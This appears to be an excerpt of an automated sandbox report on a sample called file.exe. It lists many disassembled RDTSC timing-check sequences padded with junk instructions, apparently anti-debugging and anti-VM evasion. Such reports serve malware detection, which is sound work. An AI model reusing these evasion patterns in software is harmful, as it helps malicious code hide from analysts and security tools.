                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A06AB2 second address: A06ABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A06ABF second address: A06AC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0B027 second address: A0B044 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7F147AEA51h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0B333 second address: A0B350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F7F1511CE2Dh 0x0000000b jo 00007F7F1511CE26h 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0B350 second address: A0B356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0B356 second address: A0B380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jmp 00007F7F1511CE2Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7F1511CE32h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0B380 second address: A0B399 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jns 00007F7F147AEA4Eh 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0B399 second address: A0B3A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0B3A4 second address: A0B3C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7F147AEA4Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f jo 00007F7F147AEA46h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0B63C second address: A0B648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0B648 second address: A0B688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F147AEA54h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F7F147AEA51h 0x00000010 popad 0x00000011 pop ebx 0x00000012 pushad 0x00000013 jng 00007F7F147AEA4Ah 0x00000019 push eax 0x0000001a push edx 0x0000001b jo 00007F7F147AEA46h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0B821 second address: A0B845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop eax 0x0000000c jmp 00007F7F1511CE38h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0BB56 second address: A0BBB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7F147AEA4Eh 0x00000008 jns 00007F7F147AEA46h 0x0000000e jmp 00007F7F147AEA4Eh 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 ja 00007F7F147AEA7Dh 0x0000001c push edi 0x0000001d pushad 0x0000001e popad 0x0000001f jne 00007F7F147AEA46h 0x00000025 pop edi 0x00000026 pushad 0x00000027 jmp 00007F7F147AEA55h 0x0000002c jmp 00007F7F147AEA4Eh 0x00000031 pushad 0x00000032 popad 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0C0FF second address: A0C103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0C5F6 second address: A0C648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7F147AEA46h 0x0000000a jl 00007F7F147AEA46h 0x00000010 popad 0x00000011 jmp 00007F7F147AEA58h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F7F147AEA58h 0x0000001e jo 00007F7F147AEA4Eh 0x00000024 jno 00007F7F147AEA46h 0x0000002a push ebx 0x0000002b pop ebx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0C648 second address: A0C65F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7F1511CE31h 0x00000008 jmp 00007F7F1511CE2Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D6696 second address: 9D669A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D669A second address: 9D66A4 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7F1511CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D6728 second address: 9D6735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jng 00007F7F147AEA4Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D6735 second address: 9D6750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 jg 00007F7F1511CE26h 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 pop ecx 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D6750 second address: 9D6757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D6757 second address: 9D6765 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F1511CE2Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D6765 second address: 9D67C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 popad 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 push ebx 0x00000017 jmp 00007F7F147AEA57h 0x0000001c pop ebx 0x0000001d pop eax 0x0000001e mov cx, di 0x00000021 call 00007F7F147AEA49h 0x00000026 push ebx 0x00000027 pushad 0x00000028 pushad 0x00000029 popad 0x0000002a pushad 0x0000002b popad 0x0000002c popad 0x0000002d pop ebx 0x0000002e push eax 0x0000002f jmp 00007F7F147AEA4Fh 0x00000034 mov eax, dword ptr [esp+04h] 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c pop eax 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D67C2 second address: 9D67C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D6908 second address: 9D690E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D690E second address: 9D6922 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F1511CE30h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D6922 second address: 9D6926 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D6A6F second address: 9D6A87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1511CE34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D6CA2 second address: 9D6CB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F147AEA4Eh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D718F second address: 9D7199 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7F1511CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D7398 second address: 9D73DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c and ecx, 17A4E6AFh 0x00000012 lea eax, dword ptr [ebp+12487E1Dh] 0x00000018 nop 0x00000019 pushad 0x0000001a push esi 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d pop esi 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F7F147AEA57h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D73DD second address: 9D740C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7F1511CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push esi 0x0000000d jnc 00007F7F1511CE28h 0x00000013 pop esi 0x00000014 nop 0x00000015 mov edx, dword ptr [ebp+122D1A1Dh] 0x0000001b lea eax, dword ptr [ebp+12487DD9h] 0x00000021 add dword ptr [ebp+124770CDh], ebx 0x00000027 nop 0x00000028 push edi 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D740C second address: 9B7CC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b pushad 0x0000000c jns 00007F7F147AEA59h 0x00000012 push ebx 0x00000013 jmp 00007F7F147AEA59h 0x00000018 pop ebx 0x00000019 popad 0x0000001a nop 0x0000001b push 00000000h 0x0000001d push ecx 0x0000001e call 00007F7F147AEA48h 0x00000023 pop ecx 0x00000024 mov dword ptr [esp+04h], ecx 0x00000028 add dword ptr [esp+04h], 0000001Dh 0x00000030 inc ecx 0x00000031 push ecx 0x00000032 ret 0x00000033 pop ecx 0x00000034 ret 0x00000035 call dword ptr [ebp+122D2B4Eh] 0x0000003b jng 00007F7F147AEA7Fh 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 popad 0x00000045 jmp 00007F7F147AEA58h 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B7CC5 second address: 9B7CE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1511CE39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10CCF second address: A10CF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F147AEA52h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10CF1 second address: A10CF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10CF7 second address: A10D1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 je 00007F7F147AEA48h 0x0000000d pushad 0x0000000e jmp 00007F7F147AEA56h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10D1F second address: A10D25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10D25 second address: A10D34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F7F147AEA4Eh 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A13E96 second address: A13EA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F7F1511CE26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A16227 second address: A1623D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7F147AEA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007F7F147AEA4Ch 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A15DB4 second address: A15DBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A15DBF second address: A15DC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A18A42 second address: A18A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A18A48 second address: A18A5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F7F147AEA4Fh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A18C5B second address: A18C5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A18F04 second address: A18F2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F147AEA59h 0x00000009 popad 0x0000000a jns 00007F7F147AEA48h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A18F2D second address: A18F54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7F1511CE26h 0x0000000a jmp 00007F7F1511CE34h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007F7F1511CE26h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D5CA second address: A1D601 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA4Dh 0x00000007 jnp 00007F7F147AEA52h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7F147AEA52h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D601 second address: A1D60D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D60D second address: A1D611 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1DA38 second address: A1DA3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1DBAA second address: A1DBE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA54h 0x00000007 jmp 00007F7F147AEA4Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7F147AEA55h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1DBE8 second address: A1DBF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F7F1511CE26h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A230AD second address: A230EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7F147AEA51h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F7F147AEA56h 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 jmp 00007F7F147AEA50h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23258 second address: A2327D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1511CE37h 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F7F1511CE26h 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2327D second address: A232B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA58h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F7F147AEA57h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A232B6 second address: A232BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A232BE second address: A232C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A232C7 second address: A232CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A236FB second address: A23704 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23704 second address: A23708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D6F2B second address: 9D6F2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24653 second address: A24657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2784A second address: A2784E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98F764 second address: 98F78A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F7F1511CE26h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7F1511CE39h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A27269 second address: A27273 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A27273 second address: A27288 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F7F1511CE28h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f pushad 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2E9BD second address: A2E9C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2CAA8 second address: A2CAB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F7F1511CE26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2CAB2 second address: A2CAB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2CAB8 second address: A2CAC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2CC4A second address: A2CC4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2D360 second address: A2D364 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2D364 second address: A2D39C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F7F147AEA4Ch 0x0000000e jno 00007F7F147AEA46h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 popad 0x00000017 jmp 00007F7F147AEA4Ah 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F7F147AEA4Dh 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2D5F0 second address: A2D5F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2D5F6 second address: A2D600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F7F147AEA46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2D856 second address: A2D85C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2E11A second address: A2E120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2E120 second address: A2E134 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1511CE30h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3286E second address: A32874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A32874 second address: A3287A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3287A second address: A3288B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 jp 00007F7F147AEA46h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3288B second address: A32891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A32891 second address: A328A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jmp 00007F7F147AEA4Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A32BF0 second address: A32BF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A32FF8 second address: A32FFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A33177 second address: A3317D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3317D second address: A33183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
